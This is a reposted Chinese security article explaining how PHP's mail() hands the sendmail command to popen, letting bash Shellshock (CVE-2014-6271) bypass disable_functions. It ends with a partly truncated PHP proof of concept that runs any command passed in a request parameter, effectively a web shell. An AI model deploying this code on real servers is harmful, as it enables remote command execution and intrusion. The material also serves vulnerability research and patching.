PHP Execute Command Bypass Disable_functions

admin 2021年4月2日20:27:18评论23 views字数 1486阅读4分57秒阅读模式

PHP Execute Command Bypass Disable_functions

phith0n (我也不会难过 你不要小看我) | 2014-11-18 14:09

先简单说一下php调用mail()函数的过程。

看到源码ext/mail.c

236行:

char *sendmail_path = INI_STR("sendmail_path");
char *sendmail_cmd = NULL;

从INI中获得sendmail_path变量。我们看看php.ini里是怎么说明的:

; For Unix only. You may supply arguments as well (default: "sendmail -t -i").
;sendmail_path =

注释中可以看到,send_mail默认值为"sendmail -t -i".

extra_cmd(用户传入的一些额外参数)存在的时候,调用spprintf将sendmail_path和extra_cmd组合成真正执行的命令行sendmail_cmd 。不存在则直接将sendmail_path赋值给sendmail_cmd 。

如下:

if (!sendmail_path) {
#if (defined PHP_WIN32 || defined NETWARE)
    /* handle old style win smtp sending */
    if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
       if (tsm_errmsg) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
        efree(tsm_errmsg);
      } else {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
       }
      MAIL_RET(0);
    }
    MAIL_RET(1);
#else
    MAIL_RET(0);
#endif
  }
  if (extra_cmd != NULL) {
    spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
  } else {
    sendmail_cmd = sendmail_path;
  }

之后执行:

#ifdef PHP_WIN32
  sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);
#else
  /* Since popen() doesn't indicate if the internal fork() doesn't work
   * (e.g. the shell can't be executed) we explicitly set it to 0 to be
   * sure we don't catch any older errno value. */
  errno = 0;
  sendmail = popen(sendmail_cmd, "w");
#endif

将sendmail_cmd丢给popen执行。

如果系统默认sh是bash,popen就会丢给bash执行。而之前的bash破壳(CVE-2014-6271)漏洞,直接导致我们可以利用mail()函数执行任意命令,绕过disable_functions。

影响版本:php 各版本

修复方法:修复CVE-2014-6271

给出POC(“PHP 5.x - Bypass Disable Functions (via Shellshock)”)如下:

$tmp 2>&1");
   // In Safe Mode, the user may only alter environment variableswhose names
   // begin with the prefixes supplied by this directive.
   // By default, users will only be able to set environment variablesthat
   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,
   // PHP will let the user modify ANY environment variable!
   mail("[email protected]","","","","-bv"); // -bv so we don't actuallysend any mail
   $output = @file_get_contents($tmp);
   @unlink($tmp);
   if($output != "") return $output;
   else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>

[原文地址]

文章来源于lcx.cc:PHP Execute Command Bypass Disable_functions

相关推荐: 针对TP-LINK的CSRF攻击来劫持DNS案例

0x00 背景 路由被CSRF攻击,修改DNS的话题最近一直比较活跃,但是国内貌似没有一个技术文章详细的分析此漏洞,漏洞成因比较简单,本篇来科普一下。 本篇讲得是一个利用CVE-2013-2645的漏洞,来修改TP-LINK的DNS案例,针对其他路由的攻击大同…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日20:27:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP Execute Command Bypass Disable_functionshttps://cn-sec.com/archives/317421.html

发表评论

匿名网友 填写信息